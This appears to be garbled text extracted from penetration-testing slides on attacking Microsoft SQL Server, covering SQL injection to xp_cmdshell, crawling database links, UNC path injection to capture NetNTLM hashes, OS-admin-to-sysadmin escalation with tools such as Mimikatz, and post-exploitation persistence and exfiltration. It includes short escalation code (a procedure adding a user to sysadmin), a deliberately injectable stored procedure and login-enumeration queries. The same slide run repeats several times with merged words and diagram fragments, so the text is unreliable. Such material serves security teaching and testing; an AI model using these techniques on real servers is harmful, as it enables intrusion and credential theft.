One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
